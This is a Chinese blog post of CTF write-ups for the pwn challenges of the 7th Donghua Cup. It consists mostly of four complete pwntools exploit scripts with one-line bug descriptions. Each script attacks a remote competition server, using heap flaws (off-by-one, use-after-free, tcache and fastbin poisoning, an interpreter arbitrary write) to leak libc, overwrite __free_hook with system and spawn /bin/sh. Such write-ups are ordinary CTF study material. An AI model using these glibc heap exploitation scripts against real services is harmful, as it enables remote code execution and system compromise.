东华杯7th

15th,好家伙直接诸神混战。我直接蚌埠住了好吧

image

本队所有wp在网盘,这里只分享pwn

链接:https://pan.baidu.com/s/1y_otBzxNnE-hZcBHp59rMg
提取码:4x64
–来自百度网盘超级会员V3的分享

题目链接如下

链接:https://pan.baidu.com/s/1NwOwEgtJhp5mNNN_TeM_IA
提取码:ri4y
–来自百度网盘超级会员V3的分享

pwn

cpp1

普通题,堆溢出,不过本人当off by one打了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
from pwn import *
#r=process("./pwn")
local=0
target = '47.104.143.202:43359'.split(':')
one = []
context.log_level='debug'
rc = lambda : r.recv()
rx = lambda x: r.recv(x)
ru = lambda x: r.recvuntil(x)
rud = lambda x: r.recvuntil(x, drop=True)
s = lambda x: r.send(x)
sl = lambda x: r.sendline(x)
sa = lambda x, y: r.sendafter(x, y)
sla = lambda x, y: r.sendlineafter(x, y)
close = lambda : r.close()
debug = lambda : gdb.attach(r)
shell = lambda : r.interactive()
if local:
r = process('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
r = remote(target[0],target[1])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


def add(idx,size):
sla(">>\n",str(1))
sla("I:>>\n",str(idx))
sla("S:>>\n",str(size))

def edit(idx,con):
sla(">>\n",str(2))
sla("I:>>\n",str(idx))
sla("V:>>\n",con)

def show(idx):
sla(">>\n",str(3))
sla("I:>>\n",str(idx))

def dele(idx):
sla(">>\n",str(4))
sla("I:>>\n",str(idx))

for i in range(9):
add(i,0xff)
for i in range(8):
dele(i)
for i in range(7):
add(i,0xff)
add(7,0xe8)
show(7)
leak=u64(rx(6)+b'\x00'*2)
print(hex(leak))
#raw_input()
base=leak-0x1ebce0
for i in range(9):
dele(i)
for i in range(7):
add(i,0x18)
add(7,0x18)
add(8,0x28)
add(9,0x18)
add(10,0x18)
for i in range(7):
dele(i)
dele(9)
edit(7,b'a'*0x18+b'\x51')
dele(8)

add(9,0x48)
free=base+libc.sym["__free_hook"]
edit(9,p64(0)*5+p64(0x21)+p64(free-0x18)+b'a'*0x10+b'\x21')
edit(7,'a'*0x18+'\x21')
for i in range(7):
add(i,0x18)
add(11,0x18)
add(12,0x18)
sys=base+libc.sym['system']
edit(11,b'/bin/sh\x00\n')
edit(12,b'/bin/sh\x00'+p64(sys)+b'\n')
dele(11)
#gdb.attach(r)
r.interactive()

gcc2

UAF打tcache泄露libc然后直接改fastbin的fd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from pwn import *
import time
context.arch = 'amd64'
context.log_level = 'debug'

local = 0
target = '47.104.143.202:15348'.split(':')
one = []

r = lambda : r.recv()
rx = lambda x: r.recv(x)
ru = lambda x: r.recvuntil(x)
rud = lambda x: r.recvuntil(x, drop=True)
s = lambda x: r.send(x)
sl = lambda x: r.sendline(x)
sa = lambda x, y: r.sendafter(x, y)
sla = lambda x, y: r.sendlineafter(x, y)
close = lambda : r.close()
debug = lambda : gdb.attach(r)
shell = lambda : r.interactive()

def menu(idx):
sla('>>',str(idx))

def add(idx,size):
menu(1)
sla('I:>>',str(idx))
sla('S:>>',str(size))

def edit(idx,con):
menu(2)
sla('I:>>',str(idx))
sla('V:>>',con)

def free(idx):
menu(4)
sla('I:>>',str(idx))

def show(idx):
menu(3)
sla('I:>>',str(idx))

if local:
r = process('./rz')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
r = remote(target[0],target[1])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

[add(i,0x67) for i in range(2)]
add(4,0x67)
free(1)
free(0)
show(0)
ru('\n')
heap = u64(rx(6).ljust(8,b'\x00'))-0x012f30+0x10
success(hex(heap))
edit(0,p64(heap))
add(2,0x67)
add(3,0x67)
edit(3,b'\x00'*0x48+b'\x00'*6+b'\x07')
free(4)
free(3)
show(3)
base = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))-96-0x10-libc.sym['__malloc_hook']
f_hook = libc.sym['__free_hook']+base
system = base+libc.sym['system']
success(hex(f_hook))

edit(4,p64(f_hook))
add(5,0x67)
add(6,0x67)
edit(6,p64(system))
edit(5,b'/bin/sh\x00')
free(5)
# debug()
shell()

bg3

free的时候chunk的size位没有置0,导致了同下标申请可以溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
from pwn import *
import time
context.arch = 'amd64'
context.log_level = 'debug'

local = 0
target = '47.104.143.202:25997'.split(':')
one = []

r = lambda : r.recv()
rx = lambda x: r.recv(x)
ru = lambda x: r.recvuntil(x)
rud = lambda x: r.recvuntil(x, drop=True)
s = lambda x: r.send(x)
sl = lambda x: r.sendline(x)
sa = lambda x, y: r.sendafter(x, y)
sla = lambda x, y: r.sendlineafter(x, y)
close = lambda : r.close()
debug = lambda : gdb.attach(r)
shell = lambda : r.interactive()

def menu(idx):
sla('Select:',str(idx))

def add(idx,size):
menu(1)
sla('Index:',str(idx))
sla('PayloadLength:',str(size))

def edit(idx,con):
menu(2)
sla('Index:',str(idx))
sla('BugInfo:',con)

def free(idx):
menu(4)
sla('Index:',str(idx))

def show(idx):
menu(3)
sla('Index:',str(idx))

if local:
r = process('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
r = remote(target[0],target[1])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


add(0,0x665)
add(1,0x68)
add(2,0x68)
free(0)
add(0,0x68)
show(0)
base = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))-1248-0x10-libc.sym['__malloc_hook']
f_hook = base +libc.sym['__free_hook']
system = base+libc.sym['system']
success(hex(f_hook))

add(3,0x68)
add(4,0x68)
free(4)
free(3)
pl = b'\x00'*0x68+p64(0x71)+p64(f_hook)
edit(0,pl)
add(5,0x68)
add(6,0x68)
edit(5,b'/bin/sh\x00')
edit(6,p64(system))
free(5)
# debug()
# edit(0,'a'*0x68)

shell()

boom_script

定义变量的时候生成用malloc存储,重新同名定义会free原来的再去申请新的,并且可以利用数组的存储配合input

达到任意写的效果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
libc = ELF("./libc.so.6")
p = remote("47.104.143.202",41299)
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
r = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
shell = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))


sla("$",'1')

code="""
a="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsa123altaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamha";
b=a;
a="bbbbbb";
c=0;
prints(b);
array arr[20];
arr[0]=1;
arr[1]=2;
b="666666";
a1="1";
a2="2";
a3="3";
a3="3";
a4="4";
a5="5";
a9="cccccccc";
k="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam";
a6="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam";
a7="/bin/sh";
a8="/bin/sh";
a6="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa";
k="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa";
prints("ljdhba");
inputn(c);
arr[0]=c;
arr[1]=c;
k1="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam";
array arr1[1];
prints("ljdhba");
inputn(c);
arr1[0]=c;
a7="7";
"""
sla("length:\n",str(len(code)+1))
sla("code:\n",code)
libc_base=uu64(ru("\x7f",drop=False)[-6:])-0x1ebbe0
one=libc_base+0xe6c7e
print("libc_base",hex(libc_base))
fh=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
print('one',hex(one))

sla("ljdhba\n",str(fh-0x28))
sla("ljdhba\n",str(system))
shell()

  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2015-2022 H.greed
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信